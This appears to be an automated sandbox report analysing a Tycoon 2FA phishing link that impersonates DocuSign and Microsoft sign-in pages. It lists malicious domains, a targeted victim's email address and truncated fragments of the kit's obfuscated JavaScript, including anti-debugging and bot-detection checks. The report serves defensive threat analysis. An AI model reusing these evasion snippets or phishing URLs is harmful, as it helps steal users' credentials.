Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==

Overview

General Information

Sample URL:https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==
Analysis ID:1649267
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 3252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1864,i,9605611163872503746,10620758369613315957,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1540 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 4932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_155JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    2.7.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      2.3.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        2.3.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
          2.2.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            2.2.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
              Click to see the 30 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              • AV Detection
              • Phishing
              • Compliance
              • Software Vulnerabilities
              • Networking
              • System Summary
              • Malware Analysis System Evasion

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comAvira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/favicon.icoAvira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/346fndDfLt88Ww23abbZTGRt6720Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/GDSherpa-bold.woff2Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/34iyqRIj4uqUbeg5dCF2ghaihKiMc5js7oxkB67110Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/yzyL39APlvjnlq1ppBWtnJYuv3Nymnp6erd3vFeg2V9rHBEqL4690179Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/zcE2QLrz0cz39kxUr8OYVGulcrWHmTKZ5rZwfwAvira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/mx5ja6d20FTRDDd2WxrmtuhjDo5dAvira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/ef7Ix5bMCWZ8fN6mjluRrrPLIbOzElXijXDPs7OuLhBG890145Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/wxdC57pVq7OFKAZ3ckUst5gc4IjmY47Il0FITRSk34130Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/hxkiCCfJLo900zRSkQ6C8BeFyMy8WtsetRziWWoR44Ji50IdGyaFWzS7dCnbAvira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/klBcnDvaiorUutbh5B3Adjn4Q5P6J55tBLVCjJ9xNFE56CgQsKJMuRo2uconQpvHSdX2RE5pEuv214Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/abv5IA8EJpq3Qcgh23Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/opHEkFr4q1WYO5T8k73FNznYcuhCiUef12JKL94q3dnBi6rN67131Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/ijq0GXuThn3eYSabiYAx9qo9lB6ksy0fMmudSZKutxyUkYF0XxMNi130dfxbM4xef210Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/kl4lB5NwdKx55JKSBrT1syOqZ5AE2wi6lKKLXcdqmKvsRgFbLliPAdS7m78168Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/GDSherpa-vf2.woff2Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/GDSherpa-vf.woff2Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/GDSherpa-regular.woffAvira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/opDKN2QliBSAjkfGHHCvfE9bIDoWuqGqXD12ZVJwljwbfR0D65xwnlt20ekckBZU8kgTjcd238Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/rse78Bu8wNVAGneDhXNWxmUQtGFEK55nghvksAYgzKamMRP8E6ZZ6UnZ9Zte71VOef200Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/GDSherpa-bold.woffAvira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/GDSherpa-regular.woff2Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/stQkM4Uk4MddyBfBYuWKxUiORNFVu3l67OFUF9h0Utq8kgczgm10O7gzhdgaHwUyVggh251Avira URL Cloud: Label: phishing
              Source: https://y0x6.tjsqawfetli.es/kl6EM2sFTprk4bUXtznm4INqmZtayxEMabyOlGpv3089VNZki7P5sID5CIzlx5KFZ5Wd8zmEVPvab225Avira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLJoe Sandbox AI: Score: 9 Reasons: The brand 'Quilter' is a known financial services company., The URL 'y0x6.tjsqawfetli.es' does not match the legitimate domain 'quilter.com'., The URL contains a random string and uses a '.es' domain, which is unusual for Quilter., The presence of a password input field on a non-legitimate domain is suspicious., The URL structure and domain do not align with typical Quilter web properties. DOM: 3.6.pages.csv
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLJoe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'., The provided URL 'y0x6.tjsqawfetli.es' does not match the legitimate domain for DocuSign., The URL contains a random string and an unusual domain extension '.es', which is not typically associated with DocuSign., The presence of a random subdomain and domain name suggests a high likelihood of phishing., The email domain 'quiltercheviot.com' does not match the brand or URL, adding to the suspicion. DOM: 3.5.pages.csv
              Source: Yara matchFile source: 3.6.pages.csv, type: HTML
              Source: Yara matchFile source: 3.5.pages.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.8.pages.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.10.pages.csv, type: HTML
              Source: Yara matchFile source: 2.3.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.1.pages.csv, type: HTML
              Source: Yara matchFile source: 2.2.pages.csv, type: HTML
              Source: Yara matchFile source: 2.3.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.8..script.csv, type: HTML
              Source: Yara matchFile source: 3.22..script.csv, type: HTML
              Source: Yara matchFile source: 2.1.pages.csv, type: HTML
              Source: Yara matchFile source: 2.2.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_155, type: DROPPED
              Source: Yara matchFile source: 3.19.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.7.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.2.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.13..script.csv, type: HTML
              Source: Yara matchFile source: 2.11.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.14..script.csv, type: HTML
              Source: Yara matchFile source: 3.6.pages.csv, type: HTML
              Source: Yara matchFile source: 3.5.pages.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.8.pages.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.10.pages.csv, type: HTML
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLJoe Sandbox AI: Page contains button: 'Continue' Source: '3.5.pages.csv'
              Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://csnrda.net/un-plugins/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script retrieves an email address from the URL using the 'atob' function, which could be used to steal sensitive user information. It then redirects the user to a suspicious domain, which is a common tactic in phishing attacks. Overall, this script exhibits a high level of malicious intent and poses a significant security risk.
              Source: 2.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, poses a significant security risk. Additionally, the script appears to be sending data to an unknown domain, which is a strong indicator of potential malicious activity. Overall, this script exhibits a high level of suspicion and should be treated as a high-risk threat.
              Source: 2.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees... This script demonstrates high-risk behavior with the use of the `eval` function to execute dynamic code. The obfuscated string is decoded and then evaluated, which can lead to remote code execution and potential security vulnerabilities. Additionally, the script uses a `Proxy` object to intercept property access, further increasing the risk of malicious behavior. Overall, this script exhibits a high level of risk and should be thoroughly reviewed and tested before deployment.
              Source: 2.10..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code, the presence of anti-debugging techniques, and the overall malicious intent make this a high-risk script.
              Source: 3.14..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaN... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It checks for the presence of browser automation tools, redirects to a suspicious domain, and implements keylogging functionality to intercept user input. These behaviors are highly indicative of malicious intent, warranting a high-risk score.
              Source: 3.13..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaN... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, redirects to a blank page, and blocks various keyboard shortcuts and right-click functionality. Additionally, it includes a setInterval loop that triggers a debugger statement and redirects the user to a suspicious external domain. The script also prevents the user from copying text from the page, which is a common tactic used in malicious scripts. Overall, this script demonstrates a high level of malicious intent and poses a significant security risk.
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Number of links: 0
              Source: https://login.microsoftonline.com/common/SAS/ProcessAuthHTTP Parser: Number of links: 1
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Total embedded image size: 21030
              Source: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comHTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function WnpDGFpfrE(event) { co...
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Title: Contract_Draft_2024.docx - 98241 - 2025-03-26 11:11 AM does not match URL
              Source: https://login.microsoftonline.com/common/SAS/ProcessAuthHTTP Parser: Title: Sign in to your account does not match URL
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Terms of use
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Privacy & cookies
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Terms of use
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Privacy & cookies
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Terms of use
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Privacy & cookies
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Terms of use
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Privacy & cookies
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Terms of use
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Privacy & cookies
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Terms of use
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: Invalid link: Privacy & cookies
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "bnk4y";var emailcheck = "kirstie.rees@quiltercheviot.com";var webname = "rtrim(/web8/, '/')";var urlo = "/hxkiccfjlo900zrskq6c8befymy8wtsetrziwwor44ji50idgyafwzs7dcnb";var gdf = "/gh3rwz2hxp6hqoqmlder9orhyza2c4qlh1pcd120";var odf = "/ijp3mznmjohqpz6yvnpyz3usjmonssbkobab646";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(use...
              Source: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comHTTP Parser: function juogtfmtsl(){bfumlnhihz = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+ug9ydgzvbglvicygqwdlbmn5ic0gtw9kzxjuierlc2lnbjwvdgl0bgu+ciagpgxpbmsgahjlzj0iahr0chm6ly9mb250cy5nb29nbgvhcglzlmnvbs9jc3myp2zhbwlset1nb250c2vycmf0ondnahrandawozcwmczmyw1pbhk9um9ib3rvondnahramzawozqwmds1mdamzglzcgxhet1zd2fwiibyzww9inn0ewxlc2hlzxqipgogidxzdhlszt4kicagic8qiedlbmvyywwgu3r5bgvzicovciagicbib2r5ihskicagicagzm9udc1myw1pbhk6icdsb2jvdg8nlcbzyw5zlxnlcmlmowogicagicbtyxjnaw46ida7ciagicagihbhzgrpbmc6ida7ciagicagignvbg9yoiajmzmzowogicagicbsaw5llwhlawdoddogms42owogicagicbiywnrz3jvdw5klwnvbg9yoiajzjrmngy5owogicagfqokicagiggxlcbomiwgadmgewogicagicbmb250lwzhbwlsetogj01vbnrzzxjyyxqnlcbzyw5zlxnlcmlmowogicagicbjb2xvcjogizjjm2u1mdskicagih0kciagicbhihskicagicagy29sb3i6icmzndk4zgi7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagih0kciagicbhomhvdmvyihskicagicagdgv4dc1kzwnvcmf0aw9uoib1bmrlc...
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: <input type="password" .../> found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No favicon
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No favicon
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No favicon
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No favicon
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No favicon
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No favicon
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="author".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="author".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="author".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="author".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="author".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="author".. found
              Source: https://login.microsoftonline.com/common/SAS/ProcessAuthHTTP Parser: No <meta name="author".. found
              Source: https://login.microsoftonline.com/common/SAS/ProcessAuthHTTP Parser: No <meta name="author".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="copyright".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="copyright".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="copyright".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="copyright".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="copyright".. found
              Source: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLHTTP Parser: No <meta name="copyright".. found
              Source: https://login.microsoftonline.com/common/SAS/ProcessAuthHTTP Parser: No <meta name="copyright".. found
              Source: https://login.microsoftonline.com/common/SAS/ProcessAuthHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.16:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.49.246.124:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.135:443 -> 192.168.2.16:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.4.189:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.16:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 44.208.218.209:443 -> 192.168.2.16:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.33.248.19:443 -> 192.168.2.16:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.124.122.16:443 -> 192.168.2.16:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.16:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.16:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.161.239.131:443 -> 192.168.2.16:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 99.83.148.19:443 -> 192.168.2.16:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.223.47.116:443 -> 192.168.2.16:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.207.40:443 -> 192.168.2.16:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.207.40:443 -> 192.168.2.16:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.34:443 -> 192.168.2.16:49790 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.34:443 -> 192.168.2.16:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.65.238:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.174:443 -> 192.168.2.16:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.174:443 -> 192.168.2.16:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.190.190.196:443 -> 192.168.2.16:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.190.190.196:443 -> 192.168.2.16:49847 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.48.144.218:443 -> 192.168.2.16:49867 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.48.144.218:443 -> 192.168.2.16:49868 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 40MB
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
